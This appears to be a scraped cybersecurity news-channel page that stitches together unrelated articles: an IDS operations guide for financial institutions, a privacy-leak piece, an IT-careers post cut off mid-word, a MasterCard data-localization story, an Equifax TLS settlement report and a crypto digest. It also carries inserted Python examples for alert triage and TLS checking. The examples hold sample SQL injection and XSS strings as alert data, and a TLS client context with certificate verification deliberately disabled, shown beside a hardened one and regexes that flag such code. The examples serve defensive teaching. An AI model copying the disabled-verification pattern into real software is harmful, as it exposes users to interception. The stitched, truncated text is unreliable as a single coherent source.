Channel: CodeSection, Code Section, Cybersecurity - CodeSec

Best Practices for IDS Security Operations in the Financial Industry


0X00 Introduction

If you have the time, read on; you may find some useful material here.

0X01 On Device Deployment

Well, for a seasoned engineer there is little novelty left in IDS deployment. Yes, I will not disappoint you: I also think there is not much new to it, but I still want to say a few words.

Principle one: out-of-band (mirror or tap) deployment is a given. Within a defense-in-depth architecture the best position is behind the border firewall and in front of the WAF (if there is one). That position lets the IDS deliver the most value without wasting too much effort.
Principle two: encrypted traffic cannot be inspected; make sure the traffic fed to the IDS has already been decrypted.
Principle three: the traffic must be bidirectional, because many rules rely on the response packets to make a determination. If only one direction is mirrored at deployment time, it will be very awkward later when large numbers of intrusions go undetected.

The above are the very general ground rules for IDS deployment; this article will of course not stop there. When we work through an IDS deployment plan with a customer, the customer usually asks how others deploy it, how the zones are divided, and so on. Below I describe the additional requirements the financial industry generally follows on top of these principles.

Financial-industry principle one: all traffic from the internet should pass through IDS inspection. "Internet" here means customers accessing externally exposed services over the internet.
Financial-industry principle two: all traffic from external third-party partners should pass through IDS inspection. "Third party" here generally means interbank settlement, third-party payment processors and similar traffic. Such traffic usually has its own dedicated entry point and does not come in through the internet entry point; that zone is usually called the extranet.
Financial-industry principle three: all traffic from branches and other zones to the data center server zone should pass through IDS inspection.
Financial-industry principle four: the intrusion detection system should be able to inspect all traffic crossing the monitored boundary. Normally it is deployed at key network nodes that all traffic must pass through. Ideally each zone has a core aggregation point. Some zones may not have a single aggregation point; in that case a few points at the aggregation layer that together cover all of the zone's traffic will also do.

0X02 On Alert Monitoring

Normally, for a financial institution, a two-site, three-center data center setup is the baseline, and some even go for the deluxe three-site, four-center package.



Across the whole network that adds up to ten or twenty IDS sensors, and even on a quiet day the alert volume runs to millions. That poses a big challenge for real-time monitoring. For centralized monitoring of IDS alerts across the network, a layered approach can be used to peel out, step by step, the alerts we care about and need to act on.



First, filter by rule to mask the alerts we are not interested in. Alert categories in the intrusion detection field currently fall into five groups: denial-of-service attack events, privilege-acquisition attack events, information-gathering attack events, suspicious network activity events, and network monitoring function events. The last three are not the focus of real-time monitoring; denial-of-service and privilege-acquisition alerts are what we focus on and need to handle in real time. If categorizing by these broad groups alone still does not bring the alert types down to a manageable number, we can go a step further with a "focus-only" or "ignore-only" mechanism.

Focus-only: only the selected alert rules are monitored in real time; those not selected are not.
Ignore-only: only the alert rules that were not selected are monitored in real time; the selected ones are not.

Each method suits different scenarios. As an analogy: for office workstations you can restrict users either by allowing only certain software to be installed, or by forbidding only certain software. If you can easily tell which alerts you need to watch in real time, the focus-only strategy makes filtering alert rules easy. If you cannot tell which alerts need real-time attention, but you can clearly point out which ones definitely do not, then ignore-only suits you better.

Then we can go a step further. My point here is: if your network already has a device such as a WAF, I recommend simply ignoring web-related detection rules such as SQL injection or XSS. The false-positive rate of these two categories is simply too high; since there is already a dedicated device protecting the web applications, let the IDS, a system- and application-level intrusion detection device, focus on what it does best. After all, the false-positive rate of an IDS on exploit-type alerts is very low.

If there is no WAF-class product in the network yet and the IDS has to carry SQL injection and XSS attacks as well, a second filtering layer comes in.



As everyone knows, the main detection point for SQL injection or XSS attacks is the parameters in the URL. Developers, whether intentionally, unintentionally or for other reasons, put a lot of content that matches attack signatures into the parameters they pass, which causes "false positives" when the IDS inspects them. The best fix would of course be to modify the detection rules, but the best approach is often also the worst: these features do match attack signatures, and if they are removed, a real attack will go undetected when it comes. So at this point we add one more filtering layer on the alerting platform, the black/white-list filtering shown in the figure above. SQL injection and XSS alerts are re-evaluated by URL to suppress false positives. The specific grey-list mechanism is shown in the figure below:



Initially the blacklist and whitelist pools are empty, and every alert is raised as a grey-list alert. The grey-list alerts are deduplicated by URL and the filtered logs are analyzed to decide whether they are false positives. If not, the alert signature is extracted and added to the blacklist; very serious signatures such as union or group by go straight onto the blacklist, and subsequent alerts of this kind are raised directly as blacklist alerts. If it is a false positive that is not caused by the customer's business characteristics, contact the back-end development colleagues to see whether the rule can be optimized. If it is caused by the customer's business characteristics, confirm with the customer and update the whitelist; later alerts of this kind will no longer pop up in real time, so the monitoring staff are not tied up handling them.

Next comes alert handling:



After the first two filtering layers, the alerts that remain basically all need real-time handling. Since the IDS itself has no blocking capability, it needs to work together with the firewall to achieve blocking, somewhat like an IDPS: IDS plus firewall to get the effect of an IPS.

Blocking rules also need to be created on the platform. The main elements of such a rule are: which type of alert, within what time window, reaching how many hits meets the blocking threshold. Once the threshold is reached the system raises a prompt automatically; the monitoring staff only need to confirm whether to block. Once confirmed, the monitoring platform automatically coordinates with the firewall to block the IP address, achieving the effect of intrusion prevention.
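The three filtering layers described in the preceding sections (the category and focus-only/ignore-only rule selection, the grey/black/white-list re-check of SQL injection and XSS alert URLs, and the "N alerts of one type within a time window" blocking rule) can be prototyped as a small triage pipeline. The following is an added example written for this article, not the author's platform or any IDS vendor's code; the alert records, rule names, list contents and the threshold are constructed for illustration.

```python
"""Layered IDS alert triage as the article describes it: keep only the two
real-time categories, apply a focus-only or ignore-only rule list, re-check
SQLi/XSS alerts by URL against black/white lists (unknown URLs stay grey for
review), and propose a firewall block when one source trips a rule N times
within a time window.  Added example, not the author's platform or any IDS
vendor's code; alerts, rule names, list entries and thresholds are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

REALTIME_CATEGORIES = {"dos", "privilege"}   # the two categories watched in real time
WEB_RULES = {"web.sqli", "web.xss"}          # alerts that get the URL re-check

# Constructed sample alerts: (timestamp, category, rule, src, dst, url)
SAMPLE_ALERTS = [
    ("2018-12-17 09:00:01", "privilege", "exploit.smb", "203.0.113.7", "10.1.2.3", None),
    ("2018-12-17 09:00:05", "privilege", "exploit.smb", "203.0.113.7", "10.1.2.4", None),
    ("2018-12-17 09:00:09", "privilege", "exploit.smb", "203.0.113.7", "10.1.2.5", None),
    ("2018-12-17 09:30:00", "privilege", "exploit.smb", "198.51.100.9", "10.1.2.3", None),
    ("2018-12-17 09:01:00", "info", "scan.portscan", "203.0.113.7", "10.1.2.0", None),
    ("2018-12-17 09:02:00", "privilege", "web.sqli", "203.0.113.8", "10.1.9.1",
     "http://bank.example/report?q=1%20union%20select%20card%20from%20t"),
    ("2018-12-17 09:02:30", "privilege", "web.sqli", "198.51.100.2", "10.1.9.1",
     "http://bank.example/export?sql=select%20*%20from%20orders"),
    ("2018-12-17 09:03:00", "privilege", "web.xss", "198.51.100.3", "10.1.9.1",
     "http://bank.example/search?q=%3Cscript%3Ealert(1)%3C/script%3E"),
]


def parse(raw):
    keys = ("ts", "category", "rule", "src", "dst", "url")
    alerts = [dict(zip(keys, row)) for row in raw]
    for a in alerts:
        a["ts"] = datetime.strptime(a["ts"], "%Y-%m-%d %H:%M:%S")
    return alerts


def category_filter(alerts):
    """Layer 1: drop info-gathering, suspicious-activity and monitoring events."""
    return [a for a in alerts if a["category"] in REALTIME_CATEGORIES]


def rule_filter(alerts, rules, mode):
    """Layer 1b: 'focus' keeps only the listed rules; 'ignore' drops only the listed rules."""
    if mode == "focus":
        return [a for a in alerts if a["rule"] in rules]
    if mode == "ignore":
        return [a for a in alerts if a["rule"] not in rules]
    raise ValueError("mode must be 'focus' or 'ignore'")


def web_list_check(alert, blacklist_tokens, whitelist_paths):
    """Layer 2: 'black' if the query carries a listed token (e.g. union, group by),
    'white' if the path is a confirmed business endpoint, else 'grey' for analyst review."""
    if alert["rule"] not in WEB_RULES or not alert["url"]:
        return None
    parts = urlsplit(alert["url"])
    query = unquote(parts.query).lower()
    if any(tok in query for tok in blacklist_tokens):
        return "black"
    if parts.path in whitelist_paths:
        return "white"
    return "grey"


def block_candidates(alerts, rule, threshold, window):
    """Layer 3: sources that trip `rule` at least `threshold` times within `window`."""
    by_src = defaultdict(list)
    for a in sorted(alerts, key=lambda x: x["ts"]):
        if a["rule"] == rule:
            by_src[a["src"]].append(a["ts"])
    hits = set()
    for src, times in by_src.items():
        recent = deque()
        for t in times:
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                hits.add(src)
                break
    return hits


def triage(raw_alerts, blacklist_tokens, whitelist_paths, ignore_rules=frozenset()):
    """Run all layers; returns what survived, the URL verdicts and block proposals."""
    alerts = rule_filter(category_filter(parse(raw_alerts)), ignore_rules, "ignore")
    lists = {"black": [], "white": [], "grey": []}
    for a in alerts:
        verdict = web_list_check(a, blacklist_tokens, whitelist_paths)
        if verdict:
            lists[verdict].append(a["url"])
    blocks = block_candidates(alerts, "exploit.smb", threshold=3, window=timedelta(minutes=1))
    return {"kept": len(alerts), "lists": lists, "block": blocks}
```

With the constructed input, the port scan is dropped by the category filter, the `union` URL lands on the blacklist, the whitelisted `/export` endpoint is suppressed, the XSS URL stays grey for review, and 203.0.113.7 is proposed for blocking after three exploit alerts inside one minute. In production the blacklist tokens and whitelist paths come from the grey-list review workflow described above, not from a static file.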

0X03 On IP Addresses

This part is rarely discussed with customers; at least, in the past when I discussed IDS implementation plans and subsequent operations with customers, it never came up. Yet it is a core piece of doing alert analysis well. It mainly concerns the translation between internal and external IP addresses; put bluntly, an IP-address-to-business mapping table. Barring surprises, address translation happens whenever traffic passes through a firewall or load balancer. So we need to know which business each alert's destination IP address corresponds to, especially in the extranet or core network zones, where private addresses are everywhere. If the IP address cannot be identified immediately, the alert may not be analyzed and confirmed effectively. In addition, the network often translates the source IP address too. In that case the X-Forwarded-For field translation must be enabled on the IDS device; otherwise all you see are internal IP addresses and blocking becomes impossible. Beyond that, the firewall or load balancer may have been configured for address translation without X-Forwarded-For insertion being enabled, so that even with X-Forwarded-For translation enabled on the IDS you still occasionally see alerts in the internet zone whose source is an internal IP address. A process for confirming and changing the relevant configuration with the network team is needed to make sure the configuration gets updated.

0X04 On Rule Library Updates

Everyone knows that intrusion detection devices work from a rule library, so rule library upgrades are inevitable. There are generally two update mechanisms:

Scheduled updates, following the release schedule of the device's rule library upgrade packages (the frequency is basically fixed): upgrade whenever a rule library is released.
Unscheduled updates: unlike the first approach, which upgrades as soon as a package is released, this one evaluates each released package. Only when the updated rule plugins cover vulnerabilities you care about do you upgrade; if the package contains nothing you care about, skip it.

For routine device upgrades, the general recommendation is to do them after 6 pm, outside business peak hours. Don't ask why; no arguments accepted.

Besides the routine rule library upgrades above, the other most common case is the emergency upgrade when a high-risk internet vulnerability breaks out.



When a high-risk vulnerability breaks out on the internet, our developers produce an emergency upgrade package within 8 hours; after obtaining the rule upgrade package, the device is upgraded and the effectiveness of the detection rules verified. During the whole emergency response, before the rule package is available, we can help the customer with forensic work on the business side. After the IDS upgrade, the effort can shift to a network-wide vulnerability survey.

0X05 On Alert Analysis

The methods above let us detect and handle valid intrusion alerts in real time. But how should non-real-time alerts be analyzed? Many colleagues who are new to alert log analysis run into the same problem: faced with a pile of alerts, they do not know where to start or what to do. In my view, alert analysis is nothing more than an account of what the alerts in front of you are, whether they can be classified, what their characteristics are, and, most importantly, why they are the way they are. Here are a few simple ideas:

Classify and count the alerts every day, and analyze trends and comparisons. If there is an order-of-magnitude difference, analyze it in detail and explain the cause. Possible causes: scanning, attacks, or a large number of false positives introduced by a new business application, and so on. In short, give a reasonable explanation; each case has to be analyzed on its own merits. There is no love or hate without a reason; everything has a cause.
Count each alert category, and analyze trends and comparisons. If there is an order-of-magnitude difference, analyze it in detail and explain the cause.
Compare the weekly TOP10 alerts. The aim is to learn the weight of different alert rules in this particular environment. Those with large fluctuations deserve special attention.
Analyze and trace the weekly TOP10 source IP addresses (expanding the investigation laterally through a threat intelligence platform), and run focused vulnerability checks on the TOP10 destination IP addresses.
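An added example, not from the article, of the analysis ideas above in code: daily counts per category, an order-of-magnitude jump check against the previous day, weekly TOP10 by rule and by source, and a simple hint on whether a spike is a single-source scan or a diffuse change that points at new business or rule false positives. The records are generated here for illustration (a week of steady alerts plus one spike on the last day).

```python
"""Non-real-time alert analysis: daily counts per category, jump detection
against the previous day, weekly TOP10 and a single-source-vs-diffuse hint.
Added example, not from the article; the records are generated here for
illustration (a week of steady alerts plus one spike on the last day)."""
from collections import Counter, defaultdict
from datetime import date


def build_sample_records():
    """Constructed records: (day, category, rule, src, dst)."""
    recs = []
    for d in range(11, 18):                       # 2018-12-11 .. 2018-12-17
        day = date(2018, 12, d)
        for i in range(5):
            recs.append((day, "privilege", "exploit.smb", f"203.0.113.{i}", "10.1.2.3"))
        recs.append((day, "dos", "dos.synflood", "198.51.100.1", "10.1.9.1"))
    for _ in range(80):                            # the spike: one source, one rule, one target
        recs.append((date(2018, 12, 17), "privilege", "web.sqli", "192.0.2.200", "10.1.9.1"))
    return recs


def daily_category_counts(recs):
    out = defaultdict(Counter)
    for day, cat, *_ in recs:
        out[day][cat] += 1
    return out


def flag_jumps(today, yesterday, factor=10):
    """Categories whose count grew by at least `factor` (or appeared from nothing)."""
    flagged = {}
    for cat, n in today.items():
        prev = yesterday.get(cat, 0)
        if prev == 0 or n / prev >= factor:
            flagged[cat] = (prev, n)
    return flagged


def weekly_top(recs, field, n=10):
    """TOP-n of one field over the period; field is 'rule', 'src' or 'dst'."""
    idx = {"rule": 2, "src": 3, "dst": 4}[field]
    return Counter(r[idx] for r in recs).most_common(n)


def spike_hint(recs, day, category, share=0.8):
    """Rough cause hint: if one source accounts for >= `share` of the day's alerts
    in the category it looks like a scan/attack; otherwise suspect a new business
    application generating false positives and review the rules instead."""
    todays = [r for r in recs if r[0] == day and r[1] == category]
    if not todays:
        return "no alerts"
    src, cnt = Counter(r[3] for r in todays).most_common(1)[0]
    if cnt / len(todays) >= share:
        return f"single-source spike from {src}: likely scan/attack, candidate for blocking"
    return "diffuse spike: check for new business or rule false positives"
```

The `factor` of 10 is the "order of magnitude" in the list above; in practice it is tuned per environment, and the TOP10 source list feeds the threat-intelligence lookup while the TOP10 destination list feeds the vulnerability checks.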

These are some directions for analyzing non-real-time alerts; with enough capacity they can be expanded further laterally. If capacity is limited, get real-time alert monitoring operations right first; non-real-time alert analysis can be rolled out gradually. Trust me, as you dig deeper you will find a lot of valuable and interesting things.

0X06 On Deployment Optimization

When our devices are about to reach, or already are at, a high load, it is time to consider adding devices or replacing them with higher-performance ones. This work can be done at the end of each year (procurement for the following year is usually planned before year end). It is best done by reviewing the customer's network structure and business situation, for example: how has the customer's network changed compared with a year ago, how has the business changed, how has the traffic changed. Combine this with how our devices are performing and produce concrete optimization recommendations: how many devices to add for new zones, how many devices freed from zones that no longer exist can be reused, whether the current devices can still perform well, and whether they can cover the estimated traffic growth over the next few years. Then deliver a concrete optimization plan.

0x07 Closing

Having written this far, I realize there is really not that much worth writing about IDS. I hope I have not wasted too much of your time.

In the overall defense-in-depth architecture, the IDS sits behind the firewall and in front of the WAF, receiving decrypted, bidirectional mirrored traffic out of band to detect system-level intrusion alerts.

Among the many security devices, the IDS is probably the "simplest" to deploy. But planning the logical zones sensibly in a large network, so that each IDS inspects exactly the alerts of its own zone, has become the biggest challenge for a security delivery engineer. If the zones are badly divided, alerts from different zones will inevitably land on the same device, and the alerts of that single device then carry a lot of noise during analysis and lose their representativeness for their zone.

Once the IDS is deployed in the network, the most important thing is monitoring the alerts and handling them accordingly. I described above the means and methods of filtering alerts layer by layer so that, in the end, the valid alerts are presented to us and blocked in cooperation with the firewall. At this step, alert accuracy is what we care about most; the dedicated black/white-list mechanism removes the false positives so that we can handle the blacklist alerts without worry. Because the IDS works from rules, the rule library needs to be upgraded as required. As mentioned above, upgrades can be scheduled or unscheduled; the specific approach depends on each customer's characteristics.

Beyond that, we also need to analyze the alert data regularly. What is most valuable in cybersecurity today? Data, of course. Sitting on millions of alerts a day without analyzing them would be a real waste. I shared some ideas and principles for alert analysis above and hope they spark further thought.

Once all of the above is done, the very last part is optimizing the overall IDS deployment. Only with a thorough grasp of the customer's network environment, business environment and the running state of our IDS devices can we optimize the IDS deployment in response to concrete changes, truly achieving continuous optimization and improvement from software to hardware, from physical to logical.

Finally, let us hope together that every IDS each of us has implemented delivers its full value for every minute it runs in production.


Guard Personal Privacy: Say No to Harassment and Fraud with Action


A few days ago, the Sheraton hotels under Marriott International suffered a leak of 500 million guests' information; for 327 million of them, the leaked data included names, addresses, phone numbers, birthdays, passport numbers, and for some even payment card numbers and expiry dates. The news caused an uproar. Faced with frequent data breaches, netizens voiced their views: some described the feeling as "running naked all the time"; others called for "severely punishing those responsible and compensating the losses" to handle the incident properly; but most were concerned with "how to prevent my information from leaking" and "how to minimize the harm after a leak".



(Image sourced from the internet)

Today we address the questions people care about most: how to prevent information leaks in daily life, and how to guard against the harassment and fraud that may follow a leak.

These everyday habits may expose private information

Many people, after discovering their information has leaked, wonder how exactly their private information got out. In fact, some of your inadvertent actions may be the source of the leak. According to the "Smartphone Life: Payment Viruses and Privacy Leak Report" released by Tencent Mobile Manager, the most common ways private information leaks in daily life include: sharing selfies, group photos and geolocation on social platforms; visiting URLs of unknown origin or taking online quizzes; discarding unprocessed ID card photocopies and courier waybills; and entrusting personal information to scalpers to buy tickets.



(Figure: Tencent Mobile Manager report revealing the many channels of private information leaks)

Xiao Zhang, an astrology fan, loves fortune tests and natal chart readings. After a popular period drama aired, Xiao Zhang saw a "test which character from XX you were in a previous life" quiz and eagerly clicked on it. Because answering a few simple questions yielded a character from the show, Xiao Zhang paid no attention to whether the page looked normal or the URL was trustworthy. The same day the quiz was completed, Xiao Zhang received a string of spam messages and harassing calls, annoyed but helpless. As it turned out, Xiao Zhang's personal information had been stolen by visiting a URL of unknown origin, leading to a barrage of spam.

Criminals set traps to steal users' personal information

The leak channels above may be the user's own "carelessness", but many more channels are traps set by criminals. Driven by profit, criminals use hacking techniques to attack databases, set up fake and risky Wi-Fi hotspots, and spread QR codes and phishing URLs carrying trojans, and can easily steal users' private data. At the same time, insiders reselling information, website vulnerabilities and smart hardware vulnerabilities also cause personal information leaks. The leak of 500 million guests' information at Sheraton hotels under Marriott International is a typical case of criminals stealing users' private information.



(Image sourced from the internet)

Mr. Li, an office worker and mobile gamer, was accompanying his mother to a shopping mall one weekend when he casually connected to a nearby free Wi-Fi hotspot to play. Before the game even started, pop-ups kept appearing on his phone, and they only closed one by one after he disconnected from the Wi-Fi. In fact, Mr. Li had been hit by a risky Wi-Fi attack. Besides the nuisance of the pop-ups, his personal information, such as bank account numbers and passwords, may well have been stolen without his knowledge.

Use security software to protect privacy and prevent fraud

The serious consequences of privacy leaks are obvious. Most commonly, many people who have just bought a home receive dozens of harassing calls a day from renovation companies. More seriously, leaks can lead to telecom and online fraud; especially in "fake police, prosecutor or court" scams, the precise personal information in the criminals' hands is the most direct reason victims fall into the trap.

Facing criminals who maliciously obtain personal information for harassment and fraud, the state, enterprises and individual users need to work together to defend and resist. State network regulators can take multiple measures in parallel to comprehensively suppress such incidents; enterprises need to keep upgrading their information systems to build a tight firewall around user information.

Users themselves need to raise their security awareness, protect their personal information and reject harassing and fraudulent calls. On the one hand, dispose properly of items containing personal information such as ID card photocopies and courier labels; on the other hand, use security software such as Tencent Mobile Manager to avoid leaks by identifying phishing URLs and risky Wi-Fi and scanning for malicious apps. Even after a leak, the harassment-blocking feature can avoid unnecessary calls and protect financial security.

Solemn statement: China Software News publishes/reprints this article for the purpose of conveying more information; this does not imply endorsement of its views or verification of its description. China Software News is not responsible for its authenticity.

3 Areas of IT that Exploded in 2018


Considering how quickly technology advances and evolves ― it can seem impossible to stay ahead. But if you know what’s changing, you can ride a wave to success ― instead of watching it crash around you. There are three major IT technologies that we watched grow this year, and expect to keep going in 2019.

Cybersecurity, the blockchain, and data science saw explosive evolution and growth in 2018 ― and show no sign of slowing down. Companies large and small are investing in systems and products related to these three areas. What you need to know is that they’re already on the lookout for people trained in creating, implementing, and maintaining the technology to use them.

1. Cybersecurity

It’s probably not a surprise that cybersecurity tops this list, but it should be. After all, it’s not that the importance of cybersecurity changed. Security has always been important, but it seems like everyone just realized that this year. Subsequently, companies are finally throwing resources at products and personnel to shore up their systems.

There’s no shortage of security products to buy. One estimate from Forbes predicts that products and services in the information security market will reach an excess of $114 billion by the end of 2018. That’s a 12.4% increase from 2017.

While there are plenty of products, personnel are another matter. The security industry is increasingly shorthanded. That same Forbes report says that finding people with sufficient digital security credentials was one of 2018’s most pressing concerns in hiring. If you stay ahead of the curve and know the most recent threats and capabilities, you could be the big winner.

The last few years (and elections) have seen a lot of conversation about digital security, hacking, and data manipulation. Concerns about cybersecurity won’t fade away in a few months. Security risks, business needs, and industry changes are the three major drivers behind the need for digital security. The need for cybersecurity isn’t going anywhere, but the truly savvy job-hunter should probably consider why businesses need their data secured.

So, what do you know about hardware authentication, user behavior analytics, and cloud security? Those are cybersecurity’s growth areas in 2019, and you can learn them with CBT Nuggets.

2. The Blockchain

Oh, blockchain. You were living under a rock in 2018 if you didn’t see the explosion in hiring for blockchain “experts.” Bloomberg reported that jobs that called for blockchain experience increased by four-fold in 2017. Meanwhile, Indeed.com estimates that since 2015, the number of jobs looking for blockchain training has increased by 631%.

Basically, if your resume even brushed up against a blockchain skill set, your LinkedIn message box was probably overflowing this last year. The manpower gold rush isn’t over yet. Organizations are still rushing to hire people who can fulfill their needs. Whether it’s small businesses or large, blockchain provides security, fraud-prevention, and management efficiency that’s unique.

Most people in the general public know about blockchain because of Bitcoin, the inaugural blockchain currency. But, that’s just one of the thousands of cryptocurrencies ― and, importantly, only one application of the technology. Blockchain is actually huge ― and growing.

Smart contracts are one of the most cited applications for blockchain. These programmatic self-executing agreements can unlock some exciting implications for business, real estate, or even retail transactions. With immutable, public ledgers, blockchain-enabled crowdfunding means more transparency in fundraising and money distribution. And there are even programs that enable blockchain governance ― ensuring fair representation for people in an organization’s decision-making processes. Even file storage becomes much better with blockchain.

Those changes aren’t going to come about on their own. Companies need people who know how to create and implement blockchain and how to navigate blockchain methods to help a business achieve its unique goals. As that technology expands, learning how to develop blockchain technologies will likely guarantee you a lucrative and exciting career. Even more traditional IT vendors are taking the blockchain plunge. For example, VMware recently announced that VMware Blockchain is in beta.

It wouldn’t be a bad idea to make sure your IT security and storage skills are up to snuff if you plan to work with blockchain.

3. Data Science

Many years ago, a researcher proclaimed that 90% of the data in the world today was created in the last two years. That statistic has become part truth, part fable, and mostly just a good illustration to say, “We generate so much data.” Here’s the point. Companies are hoarding more data than ever before because it’s cheap and easy, but many of them don’t know what to do with it. That’s where data science comes in.

With every transaction, call, or click, someone is collecting data about users’ behavior or preferences. But it’s only just data until someone translates that data into insight. Transforming raw data into useful information is something that trained data scientists do.

Jobs for data scientists are on the rise. In the last three years, jobs for data scientists increased by 75%. If you know Python, R, Hadoop, Java, Tableau or other languages and tools, you could find a place at the data science table.

Companies need help extracting useful information from the huge trove of big data that exists out there. If helping them do that sounds interesting to you, you might be even more interested to learn that a typical data scientist job pays about $119,000 to $168,000 near the top of the average. There’s never been a better time to learn how to analyze data, automate analysis, and update models and systems for big data companies.

Thinking about a career path or change? Data science, blockchain, and cyberse


MasterCard Warns India’s Data Storage Law Could Impact Online Payments, Security

From October 16, the Reserve Bank of India has mandated all companies facilitating financial transactions to store user data in India. As a result, credit giant MasterCard will be deleting the data related to Indian users from its data centers that are located outside the country.

MasterCard has already started storing all transaction-related data of Indian users at its data center in Pune. Following the RBI’s directives, the company will start deleting all data, including users’ card numbers and transaction details.

A Threat to Security

MasterCard said that out of the 200 countries where it operates, none has asked it to delete data from its global servers. It has also informed the RBI about the potential demerits of this localization.

Deleting data from global servers and concentrating all the information in a centralized database would weaken the “security of this data over a period of time”.


MasterCard Waiting for RBI’s Response

The date for this deletion of data from global servers is yet to be decided. MasterCard has proposed a date to the RBI and is waiting for a confirmation from the central bank. The creditor has initiated the process of copying the data and will start deleting the data once RBI acknowledges and responds to the request.

Since the deletion of data is not like “pressing a button”, it is not a simple process and requires proper scrutiny at multiple checkpoints. During the deletion, users might be charged again for a past transaction, so it has to be handled carefully.

Higher Operational Cost

MasterCard has also informed Press Trust of India that with the localization of data, there will be an “incremental cost”. This is because any data that has to be sent internationally will be processed in India first and stored domestically.

Not only does this increase operational costs, but can also result in delayed or failed transactions if the recipient country’s data protection or privacy laws are not strong enough.


Tushar Mehta - Dec 17, 2018



Equifax, others must secure apps as part of New York settlement


Written by

Dec 17, 2018 | CYBERSCOOP

The New York attorney general’s office said five apps made by well-known companies could have leaked user data. The firms Western Union, Priceline, Equifax, Spark Networks and Credit Sesame have agreed to revamp the security of their apps as part of a settlement announced Friday.

The state office said the companies failed to use the proper protocols to secure user information that is transmitted over the internet, despite assuring users about the security of the apps in question.

“Businesses that make security promises to their users especially as it relates to personal information have a duty to keep those promises,” said Barbara Underwood, the New York attorney general, in a statement .

The AG’s office said that the apps had a “well-known security vulnerability” that could enable man-in-the-middle attacks, whereby a hacker can intercept data when it’s sent via a wireless connection. The office explained that apps that fail to properly implement the Transport Layer Security (TLS) protocol to protect data in transit are particularly susceptible to such an attack. This settlement is only the latest in which state attorneys or the Federal Trade Commission have faulted organizations for exaggerating their security practices.

“Although each company represented to users that it used reasonable security measures to protect their information, the companies failed to sufficiently test whether their mobile apps had this vulnerability,” the office said. “Certain versions of the companies’ apps all failed to properly authenticate the SSL/TLS certificates they received. As a result, an attacker could have impersonated the companies’ servers and intercepted information entered into the app by the user.”
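To make the finding concrete, here is an added example (not code from any of the companies' apps) of the vulnerable pattern the office describes, a TLS client context with certificate and hostname verification switched off, beside the hardened one, plus a small source-text scan for the settings an app review should catch. `fetch_head` is illustrative and needs network access; everything else runs offline.

```python
"""TLS certificate validation: the vulnerable client configuration the
settlement describes beside a hardened one, plus a source-text check for
the settings an app review should catch.  Added example, not code from any
of the companies named; fetch_head is illustrative and needs network access."""
import re
import socket
import ssl


def insecure_context():
    """Chain and hostname checks disabled: any server with any certificate is
    accepted, so an on-path attacker can impersonate the real server (the
    'well-known vulnerability' in the settlement)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context():
    """System trust store, CERT_REQUIRED, hostname check, and no pre-1.2 TLS."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_safe(ctx):
    """The two properties a client context must have before it handles user data."""
    return bool(ctx.check_hostname) and ctx.verify_mode == ssl.CERT_REQUIRED


def fetch_head(host, ctx, port=443):
    """Send an HTTP HEAD over TLS.  With hardened_context() a self-signed,
    expired or wrong-name certificate raises ssl.SSLCertVerificationError;
    with insecure_context() the same request silently succeeds."""
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            return tls.recv(256).decode(errors="replace").splitlines()[0]


# Patterns that turn certificate validation off in common Python HTTP code
INSECURE_PATTERNS = [
    r"CERT_NONE",
    r"check_hostname\s*=\s*False",
    r"verify\s*=\s*False",
    r"_create_unverified_context",
]


def find_insecure_tls_usage(source_text):
    """Return (line number, matched pattern) for every line that disables validation."""
    hits = []
    for lineno, line in enumerate(source_text.splitlines(), 1):
        for pat in INSECURE_PATTERNS:
            if re.search(pat, line):
                hits.append((lineno, pat))
    return hits
```

The office's point that the companies "failed to sufficiently test" is what `find_insecure_tls_usage` and a test that calls `fetch_head` against a deliberately misconfigured test server address; the code-level check catches the common shortcuts, and the connection test proves the app actually rejects a bad certificate.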

The companies implicated in the settlement are a diverse set that handle data that includes basic contact information, login credentials, banking or payment information and Social Security Numbers. Such information could be used for fraud.

The settlement requires the companies to “implement comprehensive security programs to protect user information.” It was not immediately clear what those programs must entail. The office of the attorney general did not respond to a request for comment.

The settlement is part of a broader effort to find security flaws in consumer products before they are exploited.

“As part of this initiative, the office tested dozens of mobile apps that handle sensitive user information, such as credit card and bank account numbers,” the office said.

The Daily: Yellow Vest Coin Created, Security Token Trading Platform Launched


The Daily

By Lubomir Tassev

In The Daily on Monday, a new digital coin project targeting the ‘Yellow Vest’ protesters is promising censorship-free crypto transactions. Also, a regulated security token trading platform is now live in the U.S., South Korean internet giant Kakao invests in an Israeli startup, and crypto exchange Abra is giving away bitcoins for Christmas.

Also read: Trump Chooses Bitcoin Advocate as Chief of Staff, Congressman Proposes Wall Coins

‘Get Your Freedom Back!’

A new digital token project using symbols associated with the Yellow Vests (Gilets Jaunes) protestors in France has been devised. The creators of the Gilet Jaune Coin (GJCO) claim their main goal is to support what has become an international movement “in the legitimate struggle of nations to self-determination, and the reconquest of their economic, territorial, and monetary sovereignty.”

The coin’s website is littered with slogans such as “Get your freedom back,” “Long live the Gilets Jaunes” and “The people will not be sacrificed on the altar of debt!” It also abounds in promises and calls like “We will be listed on exchanges soon,” “To stay united, you should mine on our own pool” and “We invite you to buy a Gilet Jaune Coin wallet.”



The project’s team claims the coin is inspired by Bitcoin and based on Ethereum, and insists GJCO is easy to use and “perfect for transactions… at ridiculously low costs.” The developers of the new crypto further assure the public that the Gilet Jaune Coin is censorship-free and fraud-resistant, stating that its use is “recommended during the fight against the banking oligarchy, seeking to enslave us!”

It’s unclear whether the digital coin is actually related to the Yellow Vests Movement. The social media links on its website do not lead to real accounts, but coin’s Telegram channel now has over 90 members. The Mouvement des Gilets Jaunes demonstrations, which started as a protest against increased fuel prices in France this past November, have spilled over to other EU countries and even Turkey and Iraq. Protesters have also raised a number of demands related to socio-economic problems such as low incomes and government corruption.

Regulated Security Token Trading Platform Now Live

Open Finance Network (OFN), a security token trading platform regulated in the U.S., announced it’s transitioning from beta to full trading functionality. According to a blog post on Medium, one of the security tokens available to trade at launch is Blockchain Capital (BCAP). Blockchain Capital is a tokenized venture capital fund focused on digital assets. OFN notes that this is a compliant security token offering.

